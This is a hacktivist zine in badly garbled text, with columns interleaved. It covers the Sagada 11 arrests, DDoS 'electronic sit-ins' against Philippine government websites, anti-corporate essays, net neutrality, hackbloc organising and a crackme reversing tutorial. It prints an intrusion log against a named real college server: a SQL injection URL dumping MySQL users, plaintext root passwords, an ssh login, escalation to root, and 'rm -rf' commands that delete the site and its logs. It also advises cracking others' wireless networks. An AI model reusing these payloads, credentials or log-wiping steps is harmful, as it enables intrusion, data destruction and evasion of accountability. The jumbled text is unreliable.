sit-in by blatantly deleting the html FEAR AS A FORM OF SOCIAL CONTROL - As I said, the greatest weapon of those in power is fear. acad.php faculty.php index.php strike!” (the Gelmart website liter- pages that had been set-up by BrigadaE- ally stopped as thousands of on- lektronica and JLI. But the group says “no The best way to fight fear is love. Always remember to love moodledata qpopper4.0.5.tar. The greatest example of the forces that controll the world ELECTRONIC CIVIL DISOBEDIENCE against the PHIL line participants joined the sit-in) need to worry,” after suggesting cyber yourself. And make love to yourself. And also, if you love gz Unnamed protestors to use the mirror sites. using fear to strengthen there controll would be “The war yourself, love others! If you love your self and others than IPPINE NATIONAL POLICE admission.php Foundation.doc inss.php This time, the electronic UPDATES! (23/3/2006) HACK- on *”. Any war only serves to spread fear further throught you will have a much easier time coming back from a ner- moodle-latest-14.tgz researchold.php disturbance group is once TIVISTS from USA expressed the world whether it be a war on communisim, a war on vous breakdown or depression because you will always target: national defense college of the philip uploadfile again announcing their solidarity with Filipino online drugs, a war on terrorisim or the coming war on freedom. pines know that you have yourself and those that you love. apache gallery.php job2.htm second electronic sit-in activists by hijacking the PNP. Dont support war no matter what the cause! And dont sup- campaign, targeting the GOV.PH “Report a Crime” form MU research.php port fear either, coming from any source. Unfortunately http://www.ndcp.edu.ph/news2.php?actid=0000 Malakanyang website, with an automated response There are lots of amazing things happening right now and viewbak.php sometimes even the best of us can get too run down from 0000000%20UNION%20SELECT%201,user,user,user PNP and Office of the that let people join the virtual sit- every day. The forces of capitalisim are waning. They are arrow2.gif history.php job. President. The action of- in. [ Read More ] dealing with everything from the bullshit of daily life to the ,user,password,password,password,1,1,1,1,1, falling and will continue to fall only as long as we keep php MyImages SAL ficially starts on March 23, sometimes unbarable saddness of reality. The isolation of changing the world. We can’t change the world if we are 1,1,1,1%20FROM%20mysql.user&opr=EMIP viewnews.php 2006, it will last until the A GROUP of online activists of- sitting in front of a computer screen for hours every day locked in paranoia and fear so we must keep sane and calendar.php iecs.php joseph first of April. fered an alternative space to pro- can draw you into fear and paranoia as well as constantly root:6ff11b4906e6c714 *crack!* ndcpaai sched.php test after the Philippine Government stay in touch with the world and in love. surronding your self with people. Like I said, it happens root:ndcp123 too easy view.php “Technology has boasted violently prohibited the streets and to all of us so here are some tips to keep your sanity and concat.php iemelif library that it enables people in freedom parks to exercise public getting closer to each assembly and practice freedom of keep active! http://www.ndcp.edu.ph/xampp NDCPlegaldocs schedule.php http://www.ndcp.edu.ph/phpmyadmin other, so we are going to speech. The online activists calling viewwithtt.php show that if we can’t get themselves BrigadaElektronica elec- Connections ifl.php links. closer to Malakanyang tronic disturbance group organized now don’t tell me you use the same passes for php newindex.php shedule.- and protest, we will an “electronic sit-in”- bringing everything... php webalizer closely express our- street protest actions on cyber- contact.php images mandate. selves inside Malakan- space. ftp www.ndcp.edu.ph php news temp yang palace itself by just user: nobody webmail one click,” says one Electronic sit-in is a form of of the group’s techni- electronic civil disobedience pass: ndcp123 Css Images _mmServer cian who want to keep deriving its name from the Eye On Big Brother Scripts news2.php Templates anonymity. sit-ins popular during the civil ssh [email protected] xampp rights movement of the 1960s, pass: ndcp123 Download index-09132005.php mnsa2.php The group also said that this electronic sit-in and it wasn’t clear how many hits a virtual sit-in attempts to re-create that same FBI Seeks to Expand analyze the internet and telephone traffic of millions Photos temp.php demands the unconditional release of eleven their Web site recorded. action digitally using a DDoS. During an elec- Network Tapping Capabilities of Americans. While these unconstitutional war- h0no ... rant-less searches are illegal, the NSA has been elearning index091806.php mnsa3.php young backpackers including a fifteen-year- tronic sit-in, hundreds of activists attempt to The FBI is trying to expand the Communications phpwebsite testmail.php old girl who were illegally arrested, tortured access a target website simultaneously and given the green light by Bush personally, which gid=500(webmaster) Assistance for Law Enforcement Act(CALEA) to ssh [email protected] emipold.php index2bak.php mnsa4.php and wrongfully accused as NPA’s by Philip- The activists’ Web site opens with a cartoon repetitively. If done right, this will cause the demonstrates a frightening collaboration by private pine authorities, while the innocent-care-free of the “Electronic Brigade” members dressed target website to run slowly or even collapse have greater electronic surveillance capabilities. If [email protected]’s password: phpwebsite-0.10.1-RC2.tar.gz test.php corporations, law enforcement, and the executive kids were only just hitchhiking on their way as super heroes, wearing masks and caps. A entirely, preventing anyone from accessing it. passed, the bill would force manufacturers of com- [webmaster@ndcp webmaster]$ id;uname -a;w branch. An AT&T technician himself who had helped emip.php index.html mnsa5.php to the beautiful Sagada Mountains. “If the blurb accuses police of rampant human rights [source: wikipedia] mon networking devices(ethernet hubs, telephone uid=500(webmaster) in building these ‘secret rooms’ for the NSA is now pmaaaclass59 test-site responsible authorities will not take heed for violations, including allegedly torturing 11 switches, wifi routers, etc) to develop modifications groups=500(webmaster) working with the EFF in testifying against his former the call of these kids’ parents who were very teenagers it said were wrongfully accused of The action officially starts on March 23, 2006 and upgrades that integrate built-in backdoors that Linux ndcp 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 // let’s back up all their fun stuff ... much dishearten for taking away their sons being communist guerrillas. (10:00am Manila time), it will last until the first employer in a lawsuit demanding that AT&T stop il- allow law enforcement or others to monitor traffic. EST 2003 i686 i686 i386 GNU/Linux [root@ndcp ndcpsite]# tar -cvf ../archive.tar * and daughters the freedom to travel; govern- of April. They are inviting everyone to join and legally disclosing it’s customers’ communications to 09:59:53 up 34 days, 20:38, 2 users, load [root@ndcp ndcpsite]# ls -alR > ../archive.txt ment websites will virtually be deleted. ” says The 11 young people were arrested last month occupy the Philippine National Police website the government. The battle is still in the courts where average: 0.00, 0.00, 0.00 one of the technicians. while on their way to the northern tourist town for being a rampant human rights violator. EFF battles Unconstitutional Warrant- of Sagada. Their lawyer, Pablito Sanidad, on [ Read More ][ UPDATES FROM HACK- the US Government has filed a motion trying to dis- USER TTY FROM LOGIN@ IDLE // like a brick through a starbucks window... less NSA Spying on All Americans miss the EFF’s suit claiming that any investigation JCPU PCPU WHAT “The Benguet Police and Military must also Thursday asked a court in northern Benguet SITES: Post.Thing.Net | SDHacklab | Hacktiv- [root@ndcp ndcpsite]# rm -rf . give apologies to the victims of their inhuman province to free them, saying they were ar- ist.com | Hackthissite ] * With the cooperation of major telecommunica- into whether AT&T broke the law could “reveal state root tty1 - 22Feb06 2:04m [root@ndcp ndcpsite]# rm -rf /var/log activities,” demands the group. rested without warrants or probable cause. tion corporations, the NSA has launched a mas- secrets and harm national security”. 15.66s 0.58s -bash sive electronic surveillance system to monitor and webmaste pts/0 trip.cc.gt.atl.g 9:59am 0.00s // spill the goods Computer-savvy protesters start Provincial police chief Senior Superinten- 0.03s 0.01s w [root@ndcp ndcpsite]# tar -xf fun.tar ‘virtual sit-in’ campaign dent Villamor Bumanlag earlier said the 11 [webmaster@ndcp webmaster]$ su were identified by government militiamen as Password: // these guys aren’t getting back in anytime COMPUTER-SAVVY Philippine protesters communist guerrillas and denied they were [root@ndcp webmaster]# id took civil disobedience to cyberspace Thurs- tortured. uid=0(root) gid=0(root) groups=0(root),1(bin),2 (daemon),3(sys),4(adm),6(disk),10(wheel) [root@ndcp webmaster]# echo “pwned ;D” pwned ;D A Freed Sagada 11 Prisoner Speaks Out
It’s an amazing experience to be a part of a hack- Q: Aside from being happy, what other emo- tivist action and know that you can be anywhere tion arise from being released? on the planet and like minds exist. The impact that A: I’m somewhat ashame, because people tells me the web sit in had and the impetuous for it was that “so you are already out in jail” something to behold. It all started from a plea from When I look around at this world, I see several This society is a consumerism society that has a Filipino to an American (who both happened to be Q: Why are you ashame when people tells you things, I see beauty, joy and hapiness, but I see gone way too far. From the beginning of the in- in Japan) to get the word out that their friends were that? something else which is getting more and more dustrial revolution in the late 18th and early 19th jailed and tortured just because their government A: Because my family treat me differently. When common, it’s depression, agression, egoïsm, sky- century till now we have used more of the earths re- thinks punkers are different. These punkers were they tells me that, I’m thinking that they believed just helping people get food for god sake (Food Not that I’m what I’m accused of. I’m also ashame also rocketing suicide counts and general increase in sources then in the previous 4,499,999,794 years. Bombs)! The American had contacts and before because the society is not accustomed to a girl, es- dissatisfaction and psychological disorders. This resource consumption has reached a level of long, the Office of the President and the Philippine pecially at my age, already got a piece of taste in absurd proportions, almost of the level in which so- National Police websites were shut down because jail. The most common and prevailing among modern- ciety can’t supply itself anymore. Within the next 60 hacktivist got involved and helped to get the word day psychological disorders is depression. years the worlds oil resources will be completely out. From there, international press got wind of the Q: Treat differently, what do you mean, bad or Numerous recent epidemiological studies indicate exhausted, leaving an empty and collapsed soci- situation and the web sit in garnered international good treat differently? that depressive disorders in children and adoles- ety, in which only those at the top can survive, the attention and support. The American returned to A: both bad and good; the society now treats me the states to find out that the action reached the like I’m the only one that needed the help. How cents are quite common and growing. Roughly globalist extortionists. These corporations, growing American press. 3 months later, 2 of the prisoners about those other person that need more of their 15% of adolescents admit to having suffered from bigger and bigger, until they reach proportions at were released and live to tell the situation. I just reaching arms. I don’t what them to treat me baby, such a disorder at some time or other. The cause of a level that they can control governements, police want people to realize that actions matter. Don’t sit different from the other, I just want them to treat these depressions often lies in dysfunctional fami- forces and ,worst of all, global media. Orwell’s vision around thinking you can’t make a difference, when as what they treated me before. lies, negative life events (which seem to increase of the future, in which people are brainwashed into no matter where you are you can. Don’t EVER let in occurance according to the research) and an ex- believing everything the governement controlled them tell you otherwise. - Sally Q: Are you studying? treme ammount of pressure, both from peers and media tells them isn’t fiction or future, it’s reality. A: Yes, I’m grateful that we’ve reached the school’s This is an interview from one of the SAGA- enrollment period. adult expectance resulting in streess, which upon The global media isn’t independant, nor is gover- DA11, her name is Ann, living at Marikina City occurance of failure and negative reactions from nement information. Both are (indirectly) controlled Philippines. We interviewed her with a condi- Q: Now that you are studying. What are your the expecting side results in low self-esteem and by large corporations which keep the “country’s tion that we won’t ask her about what happen plan? self-defeating/distorted thinking, leading to even economy running” and finance or media stations. or to re-summarized the incident of torture. A: Spend it schooling, time is taking a toll at me. more depression. Take Japan for example, over Public opinion is controlled in subtle ways, by ad- 30,000 people last year took their lives, of which vertising, not broadcasting news that could nega- Q: What were you feeling when most of your Q: How about going to gigs and mobilization/ many where adolescents who couldn’t cope with tively influence the public and depecting dissidents visitors unfamiliar faces? movements? A: I’m very much happy, I’d seen the true cama- A: I think going to gigs would be fine, but mobiliza- the high standards of education, necesarry for cor- are “rebels, insurgents, counter-culture loons, hip- raderie really stands for, thinking that we are just tion, maybe I’ll just say pass for now. porate employment. pies or radicals”, all because those people oppose genre-mates or let say punk-mates. a society in which the masses produce for the elite, But not only adolescents cope with depression, which hold virtually all power. Q: Have anyone told you the actions done by Q: What is you greatest fear? lots of adults have to deal with it as well. Depres- Take the “Compass Group” for example, a multi- the Internet Justice League? A: I don’t want that to happened to me or to any- sion in adults is most often caused by lost fights national food catering organization. The Compass A: Yes, one else anymore. for dominance inside a social group. This “fight” is, Group is involved in a corruption scandal with its Q: What do you know about them? Q: You said that you would be lay lowing on in modern times, climbing the corporate ladder. A subsidiary Eurest Support Services winning con- A: They are the ones that help to spread the issue the mobilization. How do you plan to contrib- lot of talented people go to work every day, only tracts to provide food to United Nations peace- internationally and they were the ones that par- ute for you fear not to happen. to sit in their cubicles, commute their asses of, for keepers in Liberia. The value of Compass’s food ticipated in the virtual sit-in done to pressure the A: I’ve seen many points from that experience. a low wage, while their bosses, bulky CEOs make contracts with the United Nations is valued at $237 Philippine government by means of messing with I’ve seen what is wrong, and learned a lot from an absurd ammount of money, enough to keep million, with renewals and add-ons that could reach their websites. this experience. All I have to do, is to share this hundreds of people in a third world country alive, $351 million. experience so that is wouldn’t happen to anyone while only commanding their workers. Often these The UN Procurement Officer and Vladimir Q: Now that you are now out in jail, tell some- anymore. thing about it. CEOs don’t even care what actually goes on in their Kuznetsov Head of the UN Committee for Admin- A: At first; we’re very much happy, but just after a Q: This would be my final question. What do company, let alone being capable of understanding. istrative and Budgetary Issues were arrested and few days had pass, a police that introduced them- you still need? The researchers who work hard on new technology indicted after taking nearly $1 million in bribes from selves as CHED (Commission on Higher Education) A: For me? Maybe your question should be not get virtually no respect and a small wage, this goes Compass, allowing them to extend their globalist representatives and was looking for me, fortunately what i need, but what do the remaining SAGADA for the general commuters as well. They MAKE the corporate empire. I was out. My mother was wise enough to trace it 11 needs? company, yet the “big boss” gets away with all the Compass refused to make details public and the with the help of the CHED officials and said that money and virtually no input in the product. Climbing investigation only resulted in some low-level em- they didn’t send anyone the look for Ann. In the Q: What do you think they need? case of PETRA, someone also came to his school A: Food is a major need they have to think every- the corporate ladder means kicking down and kiss- ployees being fired and the CEO Michael Bailey and showed some photos; Ray Lester (Petra) with day. Food is given not to satisfy their hunger but ing up. If you’re not prepared to do that (because stepping down in June 2006 with a fat bonus and a someone in High status of the NPA (New Peoples just for the stomach to be filled with something. I of moral objections), you will be neglected and will Golden Handshake enough to supply a third world Army), creating a hearsays, at school that Petra is think that they need money to accommodate this remain in a low corporate position. The stress and country for years. a real NPA. We are required to report to the DSWD needs. failures that come with this enforced process are As seen, the influence of corporations is so huge (Department of Social Welfare and Development). the most common cause of depression. that it even extends to supposedly unbiased, non- We are also told that Camp Crame has an eye To send help contact us in liberation_asusual@ya- profit peacekeeping organisations as the UN, with- watching us, under surveillance hoo.com or [email protected] out having to fear reprisal. take ‘measures’” International Solidarity to Free the Sagada 11 When confronting society with these facts, most Economics: “Work hard and consume, this will con-
Two of the Sagada 11 Freed! TOKYO AND THE SAGADA 11 high-ranking corporate officials will defend them- tribute to our beautiful society and maybe one day selves with the argument of “Well, then don’t par- you’ll be rich!” “As everyone gathers for food prepared by a vegan guerrilla kitchen ticipate in the process!”. This is of course a bullshit collective known as Kaizouku Cafe, Poets were already breathing metaphors of burning Molotov cocktails in their hands, making words argument. In this society we are nothing more but Religion: “Don’t sin against the ‘rules of god’ or as bullets for a calibre pistol that can strike an enemy in one blow.” consumers, consumers of the goods we produce you’ll be damned forever after your death” ourselves, buying it for more money than we made It was Saturday night in Tokyo, as usual the post-industrial cosmo- politan city ambience is the same, although the season has changed it for, the difference sliding in the pockets of the rul- Since the birth of consciousness, hundreds of mil- from Winter to Spring (it is much less colder). Thus, everywhere is ing class. This society has developped a fetish for lions of human beings have been slaughtered by noises of ambulance sirens in the streets, stressed salary men stroll- goods and services, how useless they even may their fellows.Men – women – children ... snuffed out ing like living deads, and common music of monotonic rhythm from a subway train constitutes the everyday life of an ordinary dweller. be. The products have no values of themselves, it’s as if their lives meant nothing. a social signal to indentify yourself to the rest of Why? Because we look to leaders and priests and I just came out from my work somewhere in the posh district of society as a fellow consumer, gaining ungrounded gurus and “stars” to tell us what to do instead of Hiro-o to join the closing party of our DIY multi-media artshow—Sep- puku2, which opened last month in Irregular Rhythm Asylum (IRA). peer-respect stimulated by the media, who depicts relying on the powers of our own sovereign minds. TWO among the eleven tortured and illegally arrested backpack- It took me thirty minutes before I was able to get into the venue that consumption as the ultimate virtue. The god of this Some will see this as a “left-wing radical counter- ers also known as the SAGADA11, were already released from La is located in Shinjuku. Before I was able to enter the door of IRA, world is the coin, and it’s priests are the corporate culture hippie rant”, after all, they live in a “democ- Trinidad District Jail on May 30, Asian Commission on Human Rights several of individuals, mostly from the new “Zengakuren” generation (AHRC) said, Thursday night. were already there, sharing food and beer. I thought the night will be leaders, spreading their almost zealous relegion in racy” no? So tell me, what happens if you want the same, but it was not. every subtle way they can, enslaving the public to to disobey them? Say you have moral objections Minors Frencess Ann Bernal (15) and Ray Lester Mendoza (16) were their useless products, making them wage-slaves against the current governement. You object to released from La Trinidad District Jail after the court granted the ear- lier petition by their legal counsel to turn them over to their parents. to the corporations, without a free will. I ask you, paying taxes to support the President, his family, The two minors were amongst the 11 torture victims detained in La what are we when we don’t consume? Nothing, we his bodyguards and the friends he wangled jobs Trinidad, Benguet. They were illegally arrested in February 14, 2006 are meant to buy, media brings it to our attention, for. What do you do? Or say you don’t like your at Buguias Checkpoint by Police authorities who claimed that they were in “hot pursuit” of suspected Armed Rebels. tooth-brushes with GPS systems, earplugs with taxes being used to subsidize foreign arms sales airconditioning, cars with weather-forcasting, bikes for slaughter in the third world. How can you stop In a separate newspaper report, Judge Agapito Laoagan Jr. ruled with suncover caps, chairs with built-in remote con- it? Vote for somebody else, whose policy makes the “warrantless” arrest by the police as illegal as it did not fall un- der the principle of a “hot pursuit” operation. Under arrests made trols and beertenders, and so on. virtually no difference? Don’t vote and loose your by virtue of “hot pursuit” operations, warrants may not be required. This over-consumption society will eventually break voice? The government pretends to be there to Further, the arrests should be made within hours from the commis- down our very ability to judge products or services serve you. In reality, it’s there to tell you what to do. sion of the crime. by their values, eventually leading to a society in If you refuse to obey, you’ll be investigated – ar- which free-thinking is discouraged, descisions are rested – criminalized and made an example.Your Sagada11 Solidarity Action Held in Spain made by a select few and emotional instability will assets will be seized and given to the state. You by Jong Pairez (Indymedia Volunteer) NEWSBREAK! (3/14/2006) Police authorities asked the Quezon City be extremely common. If society continues in this will be jailed and demonized. This world will soon judge to issue a search warrant for Philippine Center for Investigative SOLIDARITY NIGHT FOR SAGADA 11 trend, global resources will be exhausted in the reach a totalitarian consumerist society dominated Journalism (PCIJ) headquarters, late this afternoon. The request for The closing party was a solidarity night. As everyone gathers for food next 60 years, leaving a devasted society with tons by administration bigwigs who view the world from the warrant issue is apparently in connection with inciting to sedi- prepared by a vegan guerrilla kitchen collective known as Kaizouku tion charges that similarly forced a local newspaper to shutdown, Cafe, Poets were already breathing metaphors of burning Molotov of environmental problems behind, in which only a stretch limos, while hunders of thousands of fami- last month. cocktails in their hands, making words as bullets for a calibre pistol select elite, based on their undeserved financial ca- lies sleep in cardboard boxes and can barely eat. that can strike an enemy in one blow. There was anger, it was anger pacities can survive, for the masses to starve. Corrupt businessmen flourish, while honest men BARCELONA, Spain-- Protest Banners were hanged outside the against all kinds of Authority that strangles the human soul, which Philippine Embassy, surprising passersby in Barcelona, yesterday has killed and detained a dozen including the eleven innocent and Such a future should be prevented and the current beg in the gutter, crime will explode, and everybody (March 13), by a group of unnamed Spanish activists, saying, “Basta young hitchhiker punks in the Philippines known as the Sagada 11. consumerist society must to every extend and cost will be forced to believe it HAS to be that way, it’s de Torturas en las Filipinas (enough torture in the Philippines)” and be abolished, lest it will be to late to stop this world the best for the collective good. Imagine you’re a “11 de Sagada LIBERTAD! (free the Sagada 11!)” After a while of continuous spontaneity, Sha-do-U of IRA beamed the online petition campaign to free the Sagada 11 on the wall from his from consuming it’s way into oblivion. child again. Filled with innocence, and wonder, Leaflets were also distributed, informing passersby about the ram- computer. He also made a brief speech about the issue. and life. Remember how good it felt?That’s what pant Human Rights violation in the Philippines under the Arroyo Re- Cast your mind back to when you were a child, the parasites stole from us. They bled us dry. And gime. The group of Spanish activists who did a small solidarity action The expression of solidarity came in different ways, but some has for the unconditional release of Sagada 11, specifically condemned pushed the button to include their names on the online petition. everything was full of hope and curiosity, a world of like sheep we lined up to give more blood. But we the illegal arrest and violent torture suffered by the eleven young Some of them were band members of various punk bands in Tokyo, adventure and challenge, what is left of it? A life to can have back all that they stole.The information backpackers from the hands of Philippine authorities. including Masau of The Urchins. be wasted in a cubicle for some CEO’s sake. Your age provides a spotlight the parasites can’t squirm
Kaori of the punk rock band—The Happening, which is considered mind being poisoned by the media: away from. They can’t take us on on the net, iden- one of the legends in Tokyo punk scene offered a song entitled “Fuck tify them. Negate their evil. Ostracize them. Show the Bastards” in acoustic while I was about to drink my third beer. Politics: “Act as you are told by our ‘laws’ or we’ll them you are not a slave! She fluently expressed well the same emotion that everybody feels during a confrontation against authority.
Our night of solidarity continued and every hour was a surprise, while the common life outside is totally predictable. I thought the night is the same, but it was not until the night has produced a moment of action, of expression and solidarity of love. how the net was lost Possible ideas for workshops and presentations: * Hold workshops on online security culture: showing peo- “When people ask me if I work in the public or private sector, Even during the age of dialup, when bandwidth was scarce ple how to use and install tor/privoxy(secure proxy through * Have a web development / programming party and make I never know to respond, as I simply work in solidarity in the except for a few locations, a model for service hosting and co- onion routing), using SSL on IRC, off the record(for secure a site for the group human sector” location appeared. This allowed someone who had a peering AIM chats), pgp/gpg, how to clear your system of tempo- agreement, which already was very expensive, to then distrib- rary files, internet caches, “deleted” files, etc * Host hacker wargames competitions and code auditing Those who currently struggle to maintain what is called “Net ute and share the cost of bandwidth by renting space and/or workshops - we can several LAMP systems(perhaps with Neutrality” on the internet I think have taken too limited an ap- servers on a rack to others. With the introduction of capped, * Explore alternatives to copyrights / anti-copyright activ- non-permanent environments, like making a customzied proach to their struggle. What they ask is to maintain an exist- application layer and legally restricted broadband, hosting be- ism: have a ‘pirate file share fest’, set up file servers on livecd) and install several open source CMS systems to ing status quo that had already been eroded from the original came the last refuge for what the original internet was about; promise and potential of the internet against those who wish to peering by equals. the network, promoting creative commons / copyleft / anti- practice remote intrusion and defense while playing “king change it even further. This to me leaves for a poor negotiat- copyright media and projects of the hill” ing position when congress loves to bridge difference with half This division between consumers and producers means only measures, and even limited compromise between the current a limited few are privileged to directly publish on the internet. * Have a “linux fest” and play with various distros and liv- * Bring lockpicks + invite people to bring various locks to status quo and proposed changes would still be disastrous. Yet—even though they pay considerably more for that privilege ecds, encouraging people to bring their machines + install practice on This would be much like North American civil libertarian’s dis- and their connectivity already, and even though consumers or dual boot linux cussing which of the remaining of the first 10 amendments they pay directly for their connectivity as well—the current internet * USE YOUR IMAGINATION will be forced to accept being discarded versus those they think backbone peer providers wish to collect additional charges, * Play the HTS challenges to learn the basics of web hack- they can still actually preserve. This to me is a long term losing and otherwise artificially constrain traffic to hosting facilities ing in a realistic environment position to occupy. and companies as they please, much like they do with those they consider consumers. The death of internet peering means In the beginning, the internet was a peering arrangement that hosts will be billed based on their popularity as well as the where all nodes were treated equally, and anyone could inter- bandwidth they consume and have paid for. It also reduces all connect from any one node to another. This was the network hosting arrangements into a question of pure economic value, How To... of peering built upon public standards that anyone could freely rather than considering the social value of sites that exist for start a free shell server / pirate wifi node / implement. Other commercial networks also existed, some built non-commercial purposes or that otherwise do not charge. on the layered OSI model. All, however, were implemented in Finally, the death of Net Neutrality means providers could se- If you have machines lying around and have a rela- some proprietary fashion, or otherwise built around some con- lectively choose to make some sites (commercial competitors, tively fast and stable internet connection, consider trolling model of centralized traffic routing, rather than that of those who publish information that they disagree with, etc) en- opening it up to the world to be used as a free shell If you are worried about being shut down, receiving essentially equal peers, and as a result diminished over time. tirely unreachable if they so choose. server or pirate node. cease-and-desist notices, or being raided by law enforcement, consider disguising the source IP of The internet eventually spread to the general population The internet flourished and grew precisely because nobody through modem dialup. This changed the internet from being was in control of traffic. That millions now are classified as pas- * free shell server - give people the chance to play the server using Tor Hidden Services. This allows a semi-closed environment connecting just a few hundred or sive consumers already is an affront to the dream of an active around with linux you to set up an anonymous domain name that thousand commercial and government institutions into some- community where everyone has opportunity to participate and * file server - allow people to swap files with other is only accessible to others browsing through Tor, thing interconnecting millions. The speeds and bandwidth of publish. The remaining struggle over Net Neutrality today is users on the system. you can set up sftp/ssh, ftpd, where the source IP of your server is obfuscated by analog modem dialup naturally limited what individuals could simply one of how small and how privileged a minority will still do over dialup links, but outside of technological limitations, the retain the ability to publish, and hence how much it will cost to or some sort of web based upload / file listing sys- routing through the tor network in reverse. internet imposed no additional discriminatory practices nor did still exercise former rights as reclassified as a limited privilege tem. those ISPs who offered direct internet access through dialup at at the discriminatory whim of a few large corporations. * tor node - if you have lots of bandwidth, consider If you have two wireless cards, and there are pass- the time. While closed garden proprietary dialup service provid- setting up a tor exit node . this has the added ad- word protected wireless networks, you can crack ers like Game Master, CompuServe, and America Online, came The internet today is already divided between a large number and went, people remained free to use direct dialup networks who are only allowed to consume and a small number who are vantage of allowing any possible law enforcement the network and set up your own network to redis- for both consuming and producing content on a peer basis. permitted to produce. Rather than simply fight to preserve this on your network to not be able to distinguish ran- tribute the internet access from the first. There was a time in fact that I ran my own domain and mail already unequal status quo, it would be far better to challenge dom tor server traffic from your personal communi- servers out of my own location on a dialup connection. it by fighting to actively restore the rights of all internet users. cations being routed through tor. In the worst case of such an effort, the current status quo then With the widespread introduction of broadband, over cable becomes the logical compromise position, rather than the start- and DSL, came the first real discrimination on the internet. Just ing point in any forced negotiation. Today, those fighting for Setting up Free Shells when finally there was enough easily deliverable bandwidth to Net Neutrality are already backed to the edge of a cliff. The If you don’t want to have to create accounts for peo- go around to enable the millions of dialup users to more directly telecoms want them to step a further ten feet over the edge, ple manually, you can use a few scripts to automate participate on the internet, it was closed off from them. At the but they (the telecoms)are probably quite willing to accept a the process. In this article, we are going to describe physical layer, peering was closed by artificial uplink “bandwidth compromise where those defending Net Neutrality are asked caps”, which restricted their ability to produce and distribute. At to step only 5 feet off instead. It would be far better to push a system which had been developed and used by the application layer, broadband providers actively discriminate forward rather than to simply try to stand still. Hairball with the HBX Free Shell project. by blocking certain ports and services, particularly in regard to email. At the legal layer, broadband service agreements offered We create a ‘new’ user account that people would through monopoly telco and cable companies restrict what ser- vices and applications people can run. log onto to create their own account; and instead of bash or sh, this account’s shell would be set in /etc/passwd to refer to a binary stored on your sys- tem which would prompt the user for their desired username and create the account and their home directory.
The program is essentially a perl script wrapped in a SUID binary written in C. The source code can be located at: disrespectcopyrights.net/archive/Code/new.pla.txt How To...
Objective: Find the password
MegaCorp recently released a new version of “LameGame” since V1.0 was could be cracked by any no-brains monkey. The new version claims to be While the internet can be a great resource for learning, it can also A sound system would be good for presentations or playing music in Disclaimer: more secure than the first, but is this true? We fire up OllyDbg again and we be a very alienating place. If we want this movement to grow, we not the background - also if meetings get big enough or if you have an Some official shit that’s needed: see that the string only need to get organized but we need to get local. What better way awesome space to throw parties at, you can bring bands or DJs and This document is to be used for legal and educational purposes only. The “HMPCBMJTU” gets copied to the address 00443010. to do this than to START YOUR OWN HACKBLOC. have bouncing dance parties after the meet. Chalkboards, white- author, nor anyone publishing this article can and/or will/might/shall not be Now we search for the “LameGame V1.1” string. This time argv[1] gets boards, overhead or digital projectors are ideal for presentations, held responsible in any way for any damage (potentially) done by anything compared to 00443010, so argv[1] is compared to “HMPCBMJTU” or is it? workshops, or other collaborative brainstorming activities. Printers PRIVATE AFFINITY GROUPS vs PUBLIC MEETINGS described in this article. If this informotion makes you want to rape, murder, Take a closer look and you’ll see that the result of strlen(“HMPCBMJTU”) would be good for copying flyers, zines, posters, bits of code, etc. There are advantages and disadvantages to each model of organi- lie, cheat, pillage, extort, be hyporitical and capatalisitic I strongly advise gets stored at EAX, and compared to DWORD PTR SS:[EBP-4] (which is People can also bring monitors and “junk boxes” so people can build zation. Certainly having open meetings at a public space that you you to cut your veins and die ... obviously a counter), if it isn’t below (so we’ve reached the end of the string can advertise would be more friendly to draw in new people and systems that people can play with - especially to tinker with new or “HMPCBMJTU”) we leave this subroutine. Now notice the following: give presentations. However such environments are not appropriate obscure operating systems or use as public computers for those who don’t bring their own. These are just a few toys and accessories one Foreword: for more sensitive work and research, where holding private meet- In this globalist world there are only two values left, how much one can DWORD PTR SS:[EBP-4] gets stored at EAX, then the offset of “HMPCB- ings at more secure locations would be more suitable. Forming an can bring: and make sure it’s clear to attendees that they are free to MJTU” is added (we now have the address of the current character in EAX), bring their own goodies as well! consume for the hightest possible price and how much one can produce for affinity group of a few trusted people who already know each other, the least possible pay, all to serve the great green god, commonly referred to the next interesting thing is the decrease of that character’s value (MOVZX where skills complement each other, and where everybody knows as ‘the dollar’, and it’s imperialistic hegemonistic pions, commonly referred EAX,BYTE PTR DS:[EAX] then DEC AL). Then we load the counter in the level of dedication / security to each other is best suited to more * Outreach + Promotion to as ‘CEOs’. Their ways of extortion of third world countries and the so- EAX and increase it and continue the loop. So what happens is that every hands-on or questionable activities. Successful hackbloc groups For public gatherings, consider doing some outreach to bring new cial ‘lowerclass’ and abduction of free speech and thought in the first world character gets decreased with 1, so the password should be “GLOBALIST”.... would maintain a balance between both public/announced and pri- people in. Once your core group has decided a date and space for have taken gross forms in today’s society.. And like this isn’t enough, they Pathetic company, they really don’t know their shit, now do they?..... vate/work meetings. your first meeting, make some flyers and posters. Put together an have been joined by whitehats to help ‘secure’ their software from people announcement explaining that you are trying to get this group to- who break their unrighteous copyrights. This article will give the reader a Act III: * Look for Existing Groups gether and that you are having an initial planning meeting at this standard overview of techniques used to protect applications and ways to Difficulity: Easy as pie.... There may already be get-togethers in your area of people working place at this time: all are welcome. Send it off to relevant local groups bypass them.. Tools: OllyDbg on similar stuff. Look for linux user groups, 2600 meetings, hack- as well as online networking sites like indymedia, craigslist, even The target applications (called “Acts” (Act I,Act II,etc)) come with this zine Objective: Find the password bloc, hacklabs, binrev meetups, ACM or other CS college groups, myspace or tribe.net. Attend local meetings and hand out flyers. And (if everything goes ok :p ) computer co-ops, or otherwise. Check out a few meetings to get the get your friends together and make sure they bring cool tricks + ideas Have phun! Well, MegaCorp anounced they recently hired a new programmer to ensure feel if it is what you are looking for. If not, talk to organizers and see for the first meeting. the cracking of their game would be made impossible by implementing a if you can help organize the group to make it exciting and active Introduction: far more sophisticated encryption algorithm [that’d be time....]. Well, we again. Otherwise you can make contacts and resources to build for Well people, reversing applications can range in difficulity level from ex- fire up Olly again and see not much has changed, the subroutine structures * Meet! have remained the same. But when we take a closer look we can see the your own meetings. The day of the meeting will come and once you get people in the tremely easy to mindcrushing. Since this article is an introduction, I won’t cryptoscheme HAS been improved (still pathetic and breakable within 13 space with all the right ingredients it’s time to get it started! Make discuss extremely advanced schemes but I will show you some nice revers- seconds but hey....) sure you introduce new people to existing members and create a ing tricks. Required knowledge to understand this article: * Look for public spaces to hold meetings Well, we don’t want to go trough all the hassle of thinking :D so we’ll just friendly and accomodating environment where people can express -)Basic understanding of 32-bit windows ASM The best spots would be centrally located geographically and easy to let the debugger do the job... themselves and introduce new ideas. After initially socializing and -)Basic understanding of the usage of Debuggers/Disassemblers find especially through public transportation. Major urban areas, cit- See the POP EBP at 004013F8? well, we’ll put a breakpoint there to 